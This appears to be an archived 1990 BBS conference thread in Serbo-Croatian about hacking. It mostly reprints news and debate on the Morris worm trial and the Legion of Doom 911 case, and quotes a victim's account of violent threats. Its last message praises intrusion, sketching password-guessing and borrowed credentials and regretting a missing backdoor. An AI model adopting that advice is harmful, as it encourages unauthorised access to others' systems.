hackers.1dejanr,
Pravila BBS ponašanja su očito zanimljiva tema za svaki BBS -
ovde predstavljamo pravila koja je istakao američki Exec-PC
BBS koji radi sa preko 100 linija i opslužuje hiljade
korisnika. žitajući tekst primetićete, međutim, da se i tamo
uglavnom radi o *korisnicima* - ženske korisnice su retkost!
─────────────────────────────────────────────────────────────────
Bulletin Topic: Rules and guidelines for Exec-PC
Copyright (c) 1989 Exec-PC All Rights Reserved
Exec-PC Suggested Guidelines
----------------------------
After running this BBS for a few years, it is obvious Exec-PC has a
mature and self-guiding group of callers. As any groups of people
will do, there have been some disagreements about what conduct is
proper on the BBS. I hope the following rules will serve as
guidelines for those moments when you ask yourself "is it OK to
do this on the BBS?"
FILE SYSTEM RULES:
1. Don't upload COMMERCIAL SOFTWARE to the BBS. Public Domain,
Shareware, Freeware, Demos are all fine. If in doubt as to
what is legal, please go to the <H>elp system and read the
topic "What is Legal for Distribution on a BBS".
2. Put your uploads in the proper file area. Picture files go
in the Picture collection, PC and Compatible (except picture)
go in Mahoney collection, MAC, Amiga and Atari go in the
approprate collections.
3. Do not upload ads for your BBS. They will be deleted.
4. Do not upload sorted copies of our file lists. We don't want
to use up disk space with duplicate material of that type.
MESSAGE SYSTEM RULES:
1. *UNLESS* the TOPIC LEADER tells you otherwise, please stick as
close to the topic as possible. For example, in the ADS
conference, try to keep your message related only to an item
for sale, an item you want to buy, or on discussion related to
items that are for sale or wanted to buy.
*IF* the topic leader encourages discussion not related to the
topic, fine, that is the prerogative of the leader. It is his/her
topic, he can run it the way he chooses.
If there is a dispute, first direct it to your Topic Leader.
If you are not satisfied with the response, then direct it to
the Sysop. DON'T take it out on the other guy.
2. If you send a message that will generate some replies, please
followup in a timely manner. I mean, if you place an AD, or if
you ask for help, please come back every day and look for replies.
It is rude to invite a response and then not read the response!
3. I don't like to see profanity in messages. I am not a prude, but
many of the people who read the messages might be extremely
offended at something you think is only slightly off color.
While our audience is mature and can take care of themselves,
offensive language only serves to blur your point and make
people think you haven't thought out the issues you are
discussing.
4. Avoid sexism! The male-to-female ratio on this BBS is sadly out
of balance. Let's not insult each other on gender related topics.
I don't just mean the men should not pick on the women - I have
seen some pretty good men-bashing going on too! I admit some of
it is fun when it starts out as mild teasing, but it usually
gets out of hand and someone gets hurt, leaves the system in a
huff, and might not ever come back!
5. Avoid racism. Same arguments as in item #3.
That is it. Not many rules. What we are really saying is,
BE COURTEOUS!
hackers.2dveselinovic,
Pozdrav. Imenjace, mislim da mi nemamo mnoge probleme koji se
ovde navode, sto ne znaci da nije bolje spreciti nego leciti. Ali,
mislim da imamo tusta i tma zaista dobrih zapazanja i sugestija,a
i konstruktivnih kritika (ref. Aca i Ilija). Pokupio sam ovo pa cu
ovih dana to prevesti, neka postoji i na nasem jeziku.
Dejan_V
hackers.3dejanr,
U Americi je stvar zvana 'resume' vrlo važna za svakog
stručnjaka - podaci o vama, šta ste radili, šta znate,
šta vas interesuje, koliko žena, dece i pasa imate i
tako to; bolji "životni rezime" automatski znači više
posla, više $$$$ i tako to.
Primera radi uz ovu poruku sam priložio 'resume' čoveka
koji se zove Allen Ackerman, BIX name 'hack' - možda će
vam čitanje teksta pomoći da, pre nego što se uputite
"preko bare", sastavite odgovarajući tekst o sebi...
resume.ziphackers.4dejanr,
U uvodniku decembarskog "Mog Mikra" čitao sam o novom zakonu o
autorskim pravima koji bi konačno trebao da smrsi konce piratima.
Večeras sam pre i na Klubu programera čuo neke nezvanične vesti prema
kojima:
1) Ako vas ufate sa piratovanim programima, rizikujete novčanu kaznu
do 100 milijardi
2) Ako vas ufate da piratujete softver, rizikujete 1-10 godina
zatvora. U oba slučaja se konfiskuje oprema na kojoj je "zločin"
izvršen.
Takođe sam video nešto što tvrde da je nacrt zakona (i u kome zaista
piše nešto slično ovome) ali mi je to što sam video pre ličilo na
neki pred-predlog a ne na zakonski tekst. Nisam uspeo da ga dobijem
"za poneti" ali mislim da ću ga pokupiti i kopirati ovih dana.
Zanima me zna li neko nešto malo preciznije od rekla-kazala o ovom
zakonu?
hackers.5dejanr,
>> ako vas ufate...
I sad se vi pitate kako da vas uhvate. Pre izvesnog vremena
razgovarao sam sa čovekom koji je neki faktor u ekipi
"Elektrodistribucije" koja šeta okolo i hvata ljude koji su
premostili sat i tako kradu struju. Ja sam uvek mislio da oni
proveravaju potrošnju, mere šta izađe iz trafo stanice i tako to, a
on mi kaže: "Ma što bre da se mučim, pa 99% tih prekršitelja uhvatimo
tako što ih komšije prijave".
To je "Elektrodistribucija Beograd", Srbija...
hackers.6vkostic,
Lepo je imati zakon, treba ga jos i sprovesti u delo. A dobro
znamo da kod nas zakoni sluze da se ne postuju.
hackers.7dejanr,
Verovatno si u pravu ali bih ja ipak voleo da znam neke detalje o tom
zakonu - bar ako ga kršimo, da znamo šta radimo!
hackers.8dejanr,
Uz ovu poruku ide RESUME jednog korisnika BIX-a koja je, po
mom mišljenju, izuzetno interesantna. Korisnik je haker, vršljao
je po sistemu, koristio lažne brojeve kreditnih kartica, uhvaćen,
osuđen... imate celu priču o tome kako je prošao. žovek je uz
to sasvim otkačen (izgleda da je i 'gay') ali mu je RESUME
zanimljiv za čitanje.
Drugi razlog za ovu poruku je što su nam svetske mreže sve
otvorenije i što će hakerisanje po stranim sistemima biti sve
češća zabava. Mislim da bi ovaj slučaj mogao da nas uveri da
čitava ta stvar nije zezanje i da se treba uzeti u pamet dok
ne bude kasno.
yllar.ziphackers.9dejanr,
Kada smo već kod hakerisanja - sećate se onoga Roberta Morisa
Juniora, sina jednog od vodećih američkih stručnjaka za bez-
bednost kompjuterskih sistema, koji je u svoje vreme ubacio
"crva" u kompletnu kompjutersku mrežu Internet po kojoj kolaju
i razne vojne tajne. E, tom geniju ili banditu se upravo sudi
i evo šta o tome kaže na BIX-u:
==========================
microbytes/items #620, from microbytes, 2371 chars, Fri Jan
19 21:12:08 1990
--------------------------
TITLE: Morris Testifies Internet Worm Was "A Dismal Failure"
Robert Morris Jr. took the stand yesterday and told a federal
jury that he created the worm program that froze more than 6000
computers on the Arpanet and Internet systems last year. It was
the first time Morris, 24, admitted publicly he had designed and
launched the rogue program.
Testifying in his own defense during his trial in Syracuse, NY,
Morris told the court he was conducting an experiment. "My
purpose was to see if I could write a program that would spread
as fast as possible," he said. Morris explained the program was
designed so the worm would spread quickly and undetected across
the nationwide system. "It was a dismal failure," he said.
Cross-examined by US Justice Department prosecutor Mark Rasch,
Morris admitted that even if the program had worked, it would
have penetrated computers he was unauthorized to use and that
experts would have to have worked to detect and defeat the worm.
Testifying for the prosecution earlier in the trial, US Army
computer expert Michael Muuss, head of the Advanced Computer
Systems team at the Ballistic Research Laboratory at Aberdeen
Proving Ground in Maryland, said his first reaction to the worm
was that his network was under attack by a foreign power. Muuss
said the worm forced him to remove 200 computers from both
military and research networks for nearly a week. It took 1500
man-hours for his department to straighten out the system, at a
cost of more than $53,000, he said.
To obtain a felony conviction, the prosecution needs to prove
that Morris caused $1000 worth of damage. If convicted, Morris
faces up to 5 years in prison and a $250,000 fine. The defense
maintains the incident was merely an experiment gone berserk and
that Morris did not intend to cause damage.
Rochester University computer lab manager Liudivikas Bukys, who
testified for the prosecution, told reporters outside the
courtroom that he found the defense's argument appalling.
"That's arguing that burglars are doing you a favor by showing
you how crummy your locks are," he said. "This particular burglar
raided every house on the block, and I guess the defense is
arguing that now everybody in the whole neighborhood has better
locks so they should feel safer."
The jury is expected to begin deliberations on Monday.
--- Jan Ziff
==========================
security/main #532, from bstrauss, 2387 chars, Wed Jan
10 21:11:01 1990
--------------------------
TITLE: Internet "WORM" trial begins
Items in brackets [] are my comments
(From January 10, 1990 Chicago Tribune) (no author credited)
SYRACUSE< N.Y. (AP) - Graduate student Robert T. Morris carefully
plotted and executed a full-scale assault on a national computer
network by setting loose a "worm" program, a federal prosecutor
argued Tuesday.
Morris "devoted a lot of time, energy and research to planning
this assault" from his computer at Cornell University in
Ithaca, Justice Department attorney Mark Rasch said in opening
arguments.
The suspended Cornell student from Arnold, Md., is the first
person brought to trial under the 1986 Computer Fraud and
Abuse Act. If convicted, Morris, 24, faces up to five years
in prison and a $250,000 fine.
[two paragraphs, describing the history of the event deleted]
In his opening statements, defense attorney Thomas Guidoboni
did not argue that Morris wasn't responsible for the worm
program. He called its creation a "simple mistake" and "not
the equivalent to a felony."
[Interesting arugments - see the last paragraph of the story]
"He made a critical mistake that caused the virus to spread much
faster than he anticipated," Guidoboni said.
Once he realized the problems the worm program could cause,
Morris tried to notify those connected with the computer
network, Guidoboni said.
The defense attorney also played down the significance of the
computer network itself. He said it was chiefly concerned with
research and was "not a network that launched missiles and sends
out armies."
"This network was used for playing chess, sending love letters,
sending recipies" and research Guidoboni said.
The runaway program has been described as a "virus" but is more
properly known as a "worm," which unlike a virus does not need
a host program to duplicate itself. [A mediacritter who
understands the difference and/or who asked the right questions
and/or who listened to what s\he was told! - Will wonders never
cease?]
Morris, who was a first-year doctoral student in computer
studies at Cornell, is the son of the chief scientist at the
government's National Computer Security Center in Bethesda, Md.
A Cornell commission concluded that Morris was guilty of
"reckless disregard." Although the panel found him responsible,
Morris has never publicly admitted creating the worm or
unleashing it.
-----Burton
==========================
security/main #535, from hshubs, 164 chars, Sat Jan
20 17:28:48 1990
There is/are comment(s) on this message.
--------------------------
TITLE: Morris, Jr.
Well, now he's put his foot in his mouth. I wonder what people's
feeling is about this.
Personally, I hope they put him away for a long time.
==========================
security/main #536, from bstrauss, 349 chars, Sat Jan
20 18:53:28 1990
This is a comment to message 535.
There are additional comments to message 535.
--------------------------
It will be interesting to see the defense - it seems the only
thing he hasn't admitted it "intent to harm" and I'm not really
sure that has to be shown to convict under the stature. Certainly
Justice doesn't believe so - they've said publicly that if he's
aquitted, they (Justice) will go back to Congress to get the laws
re-written.
-----Burton
hackers.10dejanr,
Moris je proglašen krivim! Pročitajte:
==========================
microbytes/items #626, from microbytes, 2097 chars,
Tue Jan 23 18:04:31 1990
--------------------------
TITLE: Morris Convicted of Unleashing Internet Worm
Robert Morris Jr. has been convicted of unleashing a program
that froze 6000 computers on the national Internet computer
network last year. Morris, 24, became the first person
convicted under the 1986 Computer Fraud and Abuse Act on a
felony charge; he could receive a 5-year sentence and a fine of
up to $250,000.
After several hours of deliberations, the jury returned the
guilty verdict late last night. US District Judge Howard Munson
released Morris on his own recognizance. There will be a
hearing for new motions on February 27 in Albany, NY.
Robert Morris Sr., the defendant's father and a chief scientist
at the National Security Agency's computer security division in
Maryland, said he thought the trial was fair. "Anyone would
have come to the same conclusion," he said, but added that his
son does not have "a fraudulent or dishonest bone in his body."
The younger Robert Morris said nothing as he left the court.
In closing statements, US Department of Justice trial lawyer
Mark Rasch said, "The worm didn't break in by accident or
mistake. Robert Morris intended for the worm to break in."
Morris' lawyer, Thomas Guidoboni, countered by saying Morris
made a programming mistake that inadvertently caused the
program to wreak havoc in computers at universities and
military installations.
But prosecutor Ellen Meltzer told the jury that Morris took
every conceivable step to avoid detection. "Each and every one
of you must understand that the worm was not a mistake," she
said. "It was a crime against the government of the United
States." Meltzer said that Cornell University discovered at
least 6 versions of the worm in Morris' computer accounts. She
said that in his own remarks, Morris used the words "steal" and
"break in." "These are not innocent words," Meltzer said, "and
Robert Tappan Morris did not use these words by mistake." Her
comment that "we do not thank a terrorist for increasing
airline security" prompted an unsuccessful bid from the defense
for a mistrial.
--- Jan Ziff
hackers.11zarkob,
Evo na CNN-u su opet rastrubili kako neki hakeri vrsljaju po mrezi
i kradu spiskove passworda a uz put unistavaju razne podatke po
sistemu.
Ne nisu ih uhvatili no pitanje je zasto bi neko objavio takvu
informaciju kad im izgleda nisu ni na tragu? Da nije to neki novi
antihakerski zakon na pomolu u USA?
hackers.12dejanr,
>> Ne nisu ih uhvatili no pitanje je zasto bi neko objavio takvu
>> informaciju kad im izgleda nisu ni na tragu?
Eh, eh, pa to je VEST!
hackers.13dejanr,
Kako treba kazniti autore virusa i trojanskih konja, one koji
provaljuju u sisteme i slične "vandale"? Ova diskusija sa BIX-a
može da posluži kao lepa inspiracija za sličnu diskusiju ovde.
Pozdrav,
Dejan
crit.ziphackers.14dejanr,
Uvek mislimo da smo samo mi narod koji ume da izigrava
pravila. E pa nismo - na BIX-u nedavno uvedoše da se CBIX
(to je chat podsistem) noću zatvara kako bi sistem bio
malo manje opterećen. Naravno, ljudi su ludeli oko toga
(biće tekst u "Računarima"). Danas je prvi dan da je to
na snazi.
I šta se dešava? Našli ljudi rupu u odluci - kaže da će
CBIX biti otvoren ako se organizuje neki "događaj".
Našlo se njih 15 da traže događaj koji će se zvati
"dead dog party" i eno CBIX radi, ne da radi nego je
duplo opterećeniji nego što je bio ranije.
Kažu da će raditi i sutra. Biće "deat cat party". Imaju
životinja za godinu dana!
hackers.15dejanr,
Ovo sam pronašao na jednom "hakerskom" BBS-u.
Origin 'The Lightning systems BBS'
Board : Mid-Night Hacking Subject: More news...
Sender : Sherlock Ohms (#1) Address: All
Stampted: February 14th, 1990 9:11.56 PM
-----------------------
More news about Knight Lightning and The Prophet and
Phrack and 911, etc...
-----------------------
[reprinted without permission from the Feb. 12th, 1990 issue
of Telephony]
ALLEGED HACKERS CHARGED WITH THEFT OF 911 DATA
Dawn Bushaus, Assistant Editor
Four alleged computer hackers were indicted last week on
charges that they schemed to steal and publish proprietary
BellSouth Corp. emergency data. The alleged activity could
have produced disruptions in 911 networks nationwide,
according to federal officials.
The case could raise new concerns about the security of
local exchange carriers' internal computer networks, which
house data records on customers, equipment and operations.
"Security has always been a concern for the telephone
companies," said Peter Bernstein, an analyst with Probe
Research. "If you can crack the 911 system, what does
that say about the operational support system or the billing
system?"
A federal grand jury in Chicago handed down two
indictments charging Robert J. Riggs, 20, of Decatur, Ga.,
and Craig M. Neidorf, 19, of Chesterfield, Mo., with wire
fraud, violations of the 1986 Computer Fraud Act and
interstate transportation of stolen property.
Facing similar criminal charges in Atlanta are Adam
E. Grant, 22, and Franklin E. Darden Jr., 23.
The four, alleged to be part of a closely knit group
of hackers calling themselves the Legion of Doom, reportedly
participated in a scheme to steal the BellSouth 911 data,
valued at $80,000, and publish it in a hacker magazine
known as "Phrack."
The Legion of Doom reportedly is known for entering
telephone companies' central office switches to reroute
calls, stealing computer data and giving information about
accessing computers to fellow hackers.
According to the Chicago indictment, Riggs, also
known as "The Prophet," stole a copy of the BellSouth 911
program by using a computer outside the company to tap into
the BellSouth computer. Riggs then allegedly transferred
the data to a computer bulletin board in Lockport, Ill.
Neidorf, also known as "Knight Lightning," reportedly
downloaded the information into his computer at the
University of Missouri, Columbia, where he edited it for
publication in the hacker magazine, the indictment said.
The indictment also charges that the hackers
disclosed the stolen information about the operation of the
enhanced 911 system to other hackers so that they could
illegally access the system and potentially disrupt or halt
other systems across the country.
The indictments followed a year-long investigation,
according to U.S. Attorney Ira Raphaelson. If convicted, the
alleged hackers face 31 to 32 years in prison and $122,000 in
fines.
A BellSouth spokesman said the company's security system
discovered the intrusion, which occurred about a year ago,
and the company then notified federal authorities.
Hacker invasion in the BellSouth network is very rare,
the spokesman said, adding that the company favors "stringent
laws on the matter."
The indictment solicited concern about the vulnerability
of the public network to computer hacking.
hackers.16dejanr,
Kako biste vi postupili u sledećem slučaju:
NEKO ima pristup podacima sa nekog BBS-a (recimo, SysOp je).
Pročita passworde glupih korisnika kao što sam ja tj. onih
koji na svim BBS-ovima drže isti password (dobro, na SEZAM-u
sam držao drugi - nisam baš TOLIKO blesav) i onda zove te
BBS-ove u ime tog korisnika i koristi njegov vreme i njegov
obično malo viši nivo da downloaduje fajlove i ko zna šta
još radi. Pri tome greškom ponekad umesto passworda lupi
neki svoj makro pa se njegove prave lozinke (nešto kao
jedna firma što pravi video rikordere - nije JVC) upišu u
log fajlove i na osnovu toga dotični bude lociran.
Ovo VEOMA podseća na sve provale u kompjuterske sisteme:
1) Kada se objasni ne deluje ništa posebno pametno
2) Zasniva se na gluposti korisnika
3) Ne donosi posebno veliku korist.
Šta mislite o kazni?
Dejan
PS Imena ovde ne pominjem ali će biti pomenuta u pravo
vreme.
hackers.17bulaja,
G U I L T Y ! ! ! !
L o c k H i m Up ! !
hackers.18bojt,
>> Šta mislite o kazni?
Da ga bijemo!
hackers.19braca,
Najgora kazna za zavisnike BBS-a: zabrana pristupa!
hackers.20ilja,
Osuditi ga da provede jedan dan sa i. čarkom i da mu ovaj to vreme
objašnjava sve o komunikacijama. Posle bi toliko znao da mu više ne
bi palo na pamet da pozove ni jedan BBS (a i kad bi mu palo na pamet
ne bi umeo) pa bi se kazna postigla i bez nasilnih mera.
hackers.21vkostic,
>> Najgora kazna za zavisnike BBS-a: zabrana pristupa!
Menoguce ostvariti. Moze da se javi pod drugim imenom.
hackers.22lanik,
Najgora kazna:
Stavite ga na CHAT sa Ilijom!!! (najmanje 24 sata)
hackers.23dejanr,
Šta kažete na presudu u slučaju Roberta Morisa (FORUM 25.92)?
hackers.24dejanr,
Evo još malo komentara o presudi kojom se Robert Morris spasao
zatvora:
==========================
security/long.messages #51, from bstrauss, 4348 chars,
Sat May 5 10:58:35 1990
--------------------------
*** Moved from security/main #612
of Sat May 5 10:21:56 1990
TITLE: _Computer Intruder [sic] Gets Probation And Find
but Avoids Prison Term_
NY Times, Saturday, May 5, 1990 - Page 1
[items in braces are my summarizations and comments]
SYRACUSE, May 4 - Saying the punishment of prison did not fit the
crime, a Federal judge today placed a 25 year-old computer science
student on three years' probation, fined him $10,000 and ordered
him to perform 400 hours of commmunity service for intentionally
disrupting a nationwide computer network.
The sentencing of Robert Tappan Morris had been awaited with
great interrest by computer security experts and those who
try to evade them. The case, which began when Mr. Morris
wrote a program that copied itself wildly in thousands
of separate machines in November 1988, has become a symbol
of the vulnerabilities of the computer networks that serve
as the nation's highways in the age of instant information.
Legal experts said the Government's decision to prosecute
Mr. Morris, after an eight-month debate in the Justice
Department, sent a strong message that tampering with
computers, even when not intentionally destructive, was
not acceptable. When Mr. Morris was found guilty last
January, he became the first person convicted by a jury
under the Federal Computer Fraud and Abuse Act of 1986.
[Mr. Morris had no comment, Mom said "I still don't
feel...my son is a felon", Dad said it was his son's
decision whether to appeal, and the attorney said he
would appeal.]
"It was extremely difficult in this case to strike a
fair balance between the unique circumstances surrounding
Morris' conduct and our goal of detering future
computer-related crime," Mr. Scullin [Frederick J.
Scullin, the United States Attorney] said. "I think
[Federal District] Judge [Howard G.] Munson's attempt
to fashion a fair sentance was admirable, and I don't
think it will weaken the resolve of the Federal
authorities. It should be a message to all would-be
computer hackers."
[The government decided not to file sentencing
recommendations because of the unusual nature of the
case. Mark D. Rasch a Justice Department prosecutor said
the government believed the sentance should include some
prison time. However, the judge - who had questioned the
wisdom of a felony charge in this case - did not follow the
Federal sentencing guidelines which would have imposed 21
to 27 months of prison time.]
[Judge Munson departed from the guidelines (and the
probation officer's report which recommended 15 to 21
months in jail), because "[T]he characteristics of
this case were not those of fraud and deceit," he
said. New, manditory sentencing guidelines affect crimes
committed after November, 1987 and require judges to use
a point system to weigh mitigating and aggravating
circumstances. Departing from the rules requires a
written explaination from the judge. The government has
30 days to appeal the sentance.]
[Government prosecutors portrayed the worm as a deliberate
attack, while the defense centered on the contention that
the attack was not intentional but rather because of a
coding error.]
Many computer security experts said that the case was a
poor one to use to try to set and example for theose who
would try to break into the nation's computers.
"This wasn't the appropriate test case," said Peter
Neumann, a computer scientist who specializes in computer
security issues at SRI international in Menlo Park,
Calif. But he said that the case did highlight the
many security flaws in the nation's computer networks
and pointed up the fact that much work still needs to
be done to improve computer security.
"We have an opportunity to improve things," he said.
"We better take that lesson away from this trial."
[I have to echo Peter Neumann's statements - this
wasn't the best test case for the 1986 law.
Never-the-less, it's the first one which ended up in
court and I'm disturbed by the "slap on the wrist"
nature of the sentance. If the judge imposed 20 months
in prison and then suspended it, I'd feel a bit better.]
[The fact that he's sorry and didn't intend his experiment
to screw-up the system, but did so because of a coding
error just doesn't cut it. You do these types of
experiments under controlled circumstances, not out in
the open.]
-----Burton
hackers.25dejanr,
==========================
security/main #619, from hshubs, 865 chars,
Mon May 7 01:13:23 1990
--------------------------
**COPIED FROM: ==========
law/other #2260, from ssatchell, 746 chars,
Sun May 6 14:34:56 1990
----------
TITLE: Wierd appliation of innkeeper law?
After seeing some rather caustic comments about Morris
and some of the byplay about thieves and locks, I started
thinking about parallel situations. Then it hit me.
Innkeepers. The innkeeper is responsible for the actions
of the people staying with him, by law. When the innkeeper
puts locks on the doors and takes every reasonable action
to control keys, that innkeeper's liability stops at the
individual room's door.
If the system administrator takes every reasonable
action -- and such action would require that sysadmin to
fix known holes in his security -- then you could be
justified in tossing Morris into the can and throwing
away the key. That simply isn't the case here, IMHO.
hackers.26dejanr,
NY Times, Editorial Page, May 8, 1990
_Hacker's License_
Robert Tappan Morris is the Oliver North of computer abuse. The
graduate student whiz committed a felony punishable by prison:
tyring up 6,000 computers with an electronic "worm" that spread
wildly through interconnected machines. Yet Federal Judge Howard
Munson in SYracuse sentenced him only to 400 hours of community
service and a $10,000 find. That light penalty won't deter other
hackers from trespassing on information systems.
America's baning, communications, information, travel and research
systems depend on computers. Tempering with them isa profoundly
antisocial act. Mr. Morris testified that he didn't intend all
the consequences of his escapade, but he planned it knowing there
was a law against it. He also pointed out that by demonstrating
vulnerabilities to outside penetration, he has contributed to
tighter system security. This is like defending a virus because
it produces antibodies.
The 1986 Federal Computer Fraud and Abuse Act appears to allow as
much as five years in prison for such a crime. But Judge Monson said
he couldn't fit Mr. Morris's crimes with the Federal Sentencing
Guidelines that require some incarceration. As with Mr. North and
others convicted of white collar crimes, even a taste of prison
would have resistered the seriousness of the offense - and given
future whiz kids a clearer idead of the cost of penetrating
other people's computers.
-----Burton
P.S. (offered without comment) the next piece dealt with the
inability of weather forecasting and closed "Perhaps weather
forecasting
has gotten too scientific, what with computers and satellites and
tropical depressions. What's wrong with heeding the ache in
grandpa's leg or, Heaven forbid, looking out the window?"
hackers.27dejanr,
==========================
tojerry/onions #2706, from blade_runner, 421 chars,
Thu May 10 19:17:56 1990
--------------------------
TITLE: Slimeballs
COMPUTER HACKERS CAUGHT:
The largest network of computer hackers has been apprehended. A
spokesman for the U.S. Attorney in Phoenix, Ariz., says the
hackers bilked the phone company out of $50 million using stolen
phone and bank credit cards. Hackers unsuccessfully tried to
infiltrate hospital computers and block incoming calls to the 911
emergency service in Chicago. Five men have been arrested.
hackers.28dejanr,
Mislim da sam obećao opširne izvode sa BIX-a o slučaju Morris.
Zapravo, o slučaju se zna - i šta je radio (čak i kako je
provalio u mrežu sa tehničke strane), i kakvu je štetu napravio,
i kako je uhvaćen, i kako mu je suđeno, i koliku je (uslovnu)
kaznu zaradio... Međutim, radi se o presedanu koji je izazvao
brojne komentare u raznim BIX konferencijama a bilo je i dosta
oštrijih replika da ne kažem svađe. Ovde sam pripremio izvode
sa dve konferencije - security/main i tojerry/onions.
Za download ima dosta a i čitanje će potrajati ali možda vredi
truda. Za "udicu" evo jedne od poruka iz arhive koja se odnosi
na drugi, unekoliko sličan slučaj:
==========================
tojerry/onions #2752, from jdow, 2678 chars,
Sat May 12 04:16:37 1990
This is a comment to message 2729.
--------------------------
Sigi Kluger is an apparent psychopath who was a vendor
support moderator for an unsuspecting company. (They
certainly had no involvement in Sigi's attacks.) He would
wait until the system looked "safe" and drop off and
immediately crack his way into the system with id's
that were variants of "motherf<etc>" and "<blackperson>
<sexual-intimator>" etc. He would then machine post
tens to hundreds of messages containing racial, religious,
and political hate messages. He would also pepper the
mail system with several messages to each woman
moderator (and some non-moderators) with messages
detailing how he was going to cut off our breasts with
knives and feed them to his dog and then rape us then
repeat with the knife and so forth with a whole (and
varied) litany of terror. He cost me a lot of sleep
wondering if "nf" knew my address. (It turns out he
could have found it with information he had.) I slept
with a loaded double barrel shotgun and a revolver
for most of that year and a bit beyond.
One morning I was lying in bed and a form slips by my
balcony window. Now that window is third story so there
should be nobody there. I pulled the pistol and looked.
What I saw was kid shaped so I didn't shoot. But it was
a very close thing and I am still paranoid about it.
What price can I put on what Sigi did to me? What he
did to bjc, mhofkin, rjp, etc etc? What price can be
placed on the virulent hate pouring from his messages
and what this did to BIX's reputation during some
critical startup days? (I believe several folks quit
in disgust. Fortunately most recognized a sick mind at
work and accepted that TPTB were working to track this
<censored> down. All the FBI ever "heard" in regards
his deeds is the credit card fraud. The threats meant
nothing. The courts saw it the same way. It mattered
not how much sleep how many people missed.
For all this and more Sigi Kluger received a $1000
fine and a suspended sentence. I get sour satisfaction
that it also cost him his job here in the US (he
is a German citizen), his house, and killed his bank balance.
ANd because one condition of probation was being employed
he finally had to return to Germany. It took be several
months to accept he was gone from the US. Until then I
slept with that shotgun and pistol. ANd for a while
I might have carried that pistol around in my purse
during the days. And then again I might not have.
(I did some very rational and some very irrational things
in reaction to those threats. Some of them scared sh**
out of me.) And all Sigi was trying to do is point out
how easy it was to do what he did. At least that is one
defense I heard. <brown steaming exctemental matter>!)
morris.ziphackers.29dejanr,
Ovako za početak diskusije :) , nekako sam sklon da se
složim sa onima koji su imali simpatija za Morisa i smatrali
da je relativno blaga kazna korektno odmerena. Pre svega,
ne verujem da je on HTEO da napravi toliku štetu, drugo
prijavio se sam kad je video šta se dešava, treće posle toga su
sistemi stvarno postali bezbedniji...
Sličnu "simpatiju" uopšte ne osećam prema autorima virusa.
hackers.30dejanr,
Diskusiju o Morrisu nastavićemo u SEZAM/HACKERS (nova tema). Tamo su
DETALJNI izvodi iz diskusije na BIX-u.
hackers.31dejanr,
Mali dodatak:
==========================
security/main #798, from bstrauss, 224 chars,
Sat Jun 2 13:13:17 1990
--------------------------
TITLE: Government to accept Morris' sentance
Per today's NY Times, the Government has decided not to
appeal the sentance imposed on RTMjr.
Offered solely for your edification and not to ignite
another rwar...
hackers.32dkropek,
Povodom poruka koje sam procitao u konferenciji FORUM,
pod temom TRAC, a odnose se na hakerisanje po sistemima.
Do sada nisam uspio doci do neke prihvatljive definicije
tko/sto je haker. Po mojem licnom misljenju, hakere mozemo
podijeliti na vise vrsta, od kojih su dvije glavne: hakeri na
vlastitim racunalima i hakeri na sistemima. Vjerujem da se mnogi
bave i jednim i drugim. Meni je licno npr. draze hakerisanje po
sistemima, sto je mozda posljedica toga sto sam prvo sjeo za
tastaturu jednog terminala, a zatim za ZX-a.
Sebe licno ne smatram hakerom, zbog toga jer ne provodim
dovoljno vremena cackajuci po nekim skrivenim i nedokumentiranim
mogucnostima racunala. Radim (istrazujem, cackam, hakerisem...)
samo onda kad mi je nesto hitno potrebno, a i onda vise volim da
upitam nekog za misljenje tj. za savjet kako sto uraditi, nego
da gubim vrijeme na sitnicama. Dakako da je ljepse i sladje kad
se vlastitim znanjem i trudom dodje do rezultata, ali vrijeme je
novac, a novac nije sve u zivotu, ali jeste barem 50% svega...
Ljude koji su spomenuti u FORUM/TRAC poznajem direktno
ili indirektno i dolazim do zakljucka da se sve svodi na dvije
protivnicke strane: operatere i hackere. Hakerima je u interesu
da provale zastitu, koju su im nastavili sistemski programeri i
koju odrzavaju oprateri, a operateri se trude da sistem savrseno
djeluje. Sistem je postavljen da sluzi necem korisnom, a
operateri kao sastavni dio sistema (posao im je da obavljaju
sve funkcije za koje sistem nije dovoljno inteligentan (iako
nije potrebna neka narocita inteligencija ;-) )) da osiguraju
stvarnom korisniku da nesmetano radi i koristi sistem, za koji
placa procesorsko vrijeme. Sve se moze pojednostavniti ako
zamislimo sistem kao jedan brod. Na brodu postoji kapetan i
posada. Dio posade na komandnom mostu su operateri. Korisnici
sistema su putnici, koji placaju kartu za sebe i za prtljagu
koju ukrcavaju na brod. Hakeri su slijepi putnici koji ce se
svercati na brodu na teret posade i putnika, a moraju se samo
ukrcati na brod. Ukoliko je brod velik i ima mnogo mjesta, onda
se hackeri mogu voziti neprimjetno i koristiti sve pogodnosti
koje brod pruza. Za mali brod situacija se mijenja. Operateri
ubrzo upoznaju korisnike i nema svercanja ili ako ga ima onda
moraju hakeri koristiti kabinu korisnika i ponekad mu pojesti
rucak ili veceru, a osim toga, moraju se skrivati u potpalublju.
Kod velikih, prekooceanskih brodova, mozemo se prosvercati i na
drugi kontinent... Kod svega ovoga postoji nekoliko kriticnih
momenata, a to su: ukrcavanje na brod, koriscenje tudje kabine,
slistavanje tudjeg rucka, iskrcavanje i ponovo ukrcavanje.
Sve je daleko lakse ukoliko poznajemo brod. Kada
upoznamo brod i sve njegove skrivene kutke, kao i nacin rada
posade, mozemo nesmetano raditi sve sto nam je volja, u okviru
utvrdjenih mogucnosti. Naravno, da bismo upoznali brod, moramo
se ukrcati na njega. To se moze uraditi na vise nacina. Jedan od
najlosijih je ukucavanje nasumce username/passworda, nadajuci se
gluposti korisnika, pa ako uspije... Na zalost, vec na tom
koraku je Yadro alias Wizard zapeo. Srecom otkrio je drugi nacin
za ulazak na sistem, pa i malo vise od toga... Uvijek postoji
neki prijatelj(ica) koji zna jos po nekog prijatelja(icu), pa se
tako dodje do nekog username/passworda koji nije bas ono sto mi
trazimo, ali moze posluziti... Na zalost, ovdje Wizard radi jos
jednu gresku: koristi mali password za sve ono sto je uspio
otkriti i ne razmisljajuci da ce jednog dana netko zavrnuti
slavinu... Trebao je pripremiti mala vrata na ulazak na sistem,
ali on se toliko veselio i brckao u poplavi informacija da se
nenadano odjednom nasao na suhom.
Priznajem, JUPAK je zanimljiv, ali do njega treba doci.
Naravno, treba se i temeljitije pripremiti. Nisu ni operateri
svemoguci. Uostalom, veliki sistemi se uvijek tesko prate i
stite. Naravno, Yadro je jos dobro prosao, sjetimo se samo
Morisa, koji je za opomenu ostalima proglasen kriminalcem i samo
zato jer je imao bug u programu. Moris je zelio uraditi pravu
stvar (bez onih glupih kritika molim, u stilu: kako bi to bilo
